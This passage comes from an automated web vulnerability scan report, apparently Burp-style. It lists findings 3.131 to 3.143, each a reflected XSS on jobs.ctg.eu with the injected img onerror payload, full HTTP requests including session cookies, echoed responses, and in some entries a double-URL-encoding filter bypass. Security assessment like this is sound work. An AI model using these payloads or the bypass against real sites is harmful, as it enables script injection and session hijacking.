GET /sites/allb7318"><img%20src%3da%20onerror%3dalert(1)>5390e89c2cb/themes/threesixty/js/easyTooltip.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-allb7318"><img src=a onerror=alert(1)>5390e89c2cb-themes-threesixty-js-easyTooltip.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.131. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/easyTooltip.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29e37"><img%20src%3da%20onerror%3dalert(1)>1d222c0ec3b was submitted in the REST URL parameter 3. This input was echoed as 29e37"><img src=a onerror=alert(1)>1d222c0ec3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes29e37"><img%20src%3da%20onerror%3dalert(1)>1d222c0ec3b/threesixty/js/easyTooltip.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:42:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:42:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes29e37"><img src=a onerror=alert(1)>1d222c0ec3b-threesixty-js-easyTooltip.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.132. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/easyTooltip.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b3d"><img%20src%3da%20onerror%3dalert(1)>924cd6c50ba was submitted in the REST URL parameter 4. This input was echoed as 76b3d"><img src=a onerror=alert(1)>924cd6c50ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sites/all/themes/threesixty76b3d"><img%20src%3da%20onerror%3dalert(1)>924cd6c50ba/js/easyTooltip.js?L HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: jobs.ctg.eu

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:12:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS5fce01b171785c9633d86359009a9819=ddb1412a573261f6625b612601e0723c; expires=Sun, 15-May-2011 20:46:10 GMT; path=/; domain=.jobs.ctg.eu
Last-Modified: Fri, 22 Apr 2011 17:12:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty76b3d"><img src=a onerror=alert(1)>924cd6c50ba-js-easyTooltip.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.133. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/easyTooltip.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a7c"><img%20src%3da%20onerror%3dalert(1)>eda61fe431e was submitted in the REST URL parameter 4. This input was echoed as 56a7c"><img src=a onerror=alert(1)>eda61fe431e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty56a7c"><img%20src%3da%20onerror%3dalert(1)>eda61fe431e/js/easyTooltip.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:44:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:44:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty56a7c"><img src=a onerror=alert(1)>eda61fe431e-js-easyTooltip.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.134. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/easyTooltip.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80264"><img%20src%3da%20onerror%3dalert(1)>f6f1a8b106 was submitted in the REST URL parameter 5. This input was echoed as 80264"><img src=a onerror=alert(1)>f6f1a8b106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/js80264"><img%20src%3da%20onerror%3dalert(1)>f6f1a8b106/easyTooltip.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:45:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:45:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-js80264"><img src=a onerror=alert(1)>f6f1a8b106-easyTooltip.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.135. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/easyTooltip.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb57e"><img%20src%3da%20onerror%3dalert(1)>5c57ffbac9c was submitted in the REST URL parameter 6. This input was echoed as cb57e"><img src=a onerror=alert(1)>5c57ffbac9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/js/easyTooltip.jscb57e"><img%20src%3da%20onerror%3dalert(1)>5c57ffbac9c?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:46:17 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:46:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-js-easyTooltip.jscb57e"><img src=a onerror=alert(1)>5c57ffbac9c not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.136. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/effects.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55d6e"><img%20src%3da%20onerror%3dalert(1)>17021c34628 was submitted in the REST URL parameter 1. This input was echoed as 55d6e"><img src=a onerror=alert(1)>17021c34628 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites55d6e"><img%20src%3da%20onerror%3dalert(1)>17021c34628/all/themes/threesixty/js/effects.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:34:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:34:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites55d6e"><img src=a onerror=alert(1)>17021c34628-all-themes-threesixty-js-effects.js not-front not-logged-in page-sites55d6eimg-srca-onerroralert117021c34628 no-sidebars">
...[SNIP]...

3.137. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/effects.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94d19"><img%20src%3da%20onerror%3dalert(1)>638294a4b77 was submitted in the REST URL parameter 2. This input was echoed as 94d19"><img src=a onerror=alert(1)>638294a4b77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all94d19"><img%20src%3da%20onerror%3dalert(1)>638294a4b77/themes/threesixty/js/effects.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:36:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:36:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all94d19"><img src=a onerror=alert(1)>638294a4b77-themes-threesixty-js-effects.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.138. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/effects.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f881"><img%20src%3da%20onerror%3dalert(1)>4e2f24ccbfa was submitted in the REST URL parameter 3. This input was echoed as 1f881"><img src=a onerror=alert(1)>4e2f24ccbfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes1f881"><img%20src%3da%20onerror%3dalert(1)>4e2f24ccbfa/threesixty/js/effects.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:37:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:37:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes1f881"><img src=a onerror=alert(1)>4e2f24ccbfa-threesixty-js-effects.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.139. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/effects.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f30d"><img%20src%3da%20onerror%3dalert(1)>db1815b09dc was submitted in the REST URL parameter 4. This input was echoed as 2f30d"><img src=a onerror=alert(1)>db1815b09dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty2f30d"><img%20src%3da%20onerror%3dalert(1)>db1815b09dc/js/effects.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:39:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:39:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty2f30d"><img src=a onerror=alert(1)>db1815b09dc-js-effects.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.140. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/effects.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4930d"><img%20src%3da%20onerror%3dalert(1)>04f9905d679 was submitted in the REST URL parameter 4. This input was echoed as 4930d"><img src=a onerror=alert(1)>04f9905d679 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sites/all/themes/threesixty4930d"><img%20src%3da%20onerror%3dalert(1)>04f9905d679/js/effects.js?L HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: jobs.ctg.eu

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:12:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS5fce01b171785c9633d86359009a9819=60949fc6a526b58054e62d243c4d082a; expires=Sun, 15-May-2011 20:46:13 GMT; path=/; domain=.jobs.ctg.eu
Last-Modified: Fri, 22 Apr 2011 17:12:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty4930d"><img src=a onerror=alert(1)>04f9905d679-js-effects.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.141. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/effects.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9c7a"><img%20src%3da%20onerror%3dalert(1)>e4699464745 was submitted in the REST URL parameter 5. This input was echoed as f9c7a"><img src=a onerror=alert(1)>e4699464745 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/jsf9c7a"><img%20src%3da%20onerror%3dalert(1)>e4699464745/effects.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:41:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:41:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-jsf9c7a"><img src=a onerror=alert(1)>e4699464745-effects.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.142. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/effects.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f89d3"><img%20src%3da%20onerror%3dalert(1)>87598a82479 was submitted in the REST URL parameter 5. This input was echoed as f89d3"><img src=a onerror=alert(1)>87598a82479 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sites/all/themes/threesixty/jsf89d3"><img%20src%3da%20onerror%3dalert(1)>87598a82479/effects.js?L HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: jobs.ctg.eu

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:15:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS5fce01b171785c9633d86359009a9819=27a9e43b9843be15421a2e6cfd912ea9; expires=Sun, 15-May-2011 20:49:10 GMT; path=/; domain=.jobs.ctg.eu
Last-Modified: Fri, 22 Apr 2011 17:15:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-jsf89d3"><img src=a onerror=alert(1)>87598a82479-effects.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.143. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/effects.js

Issue detail

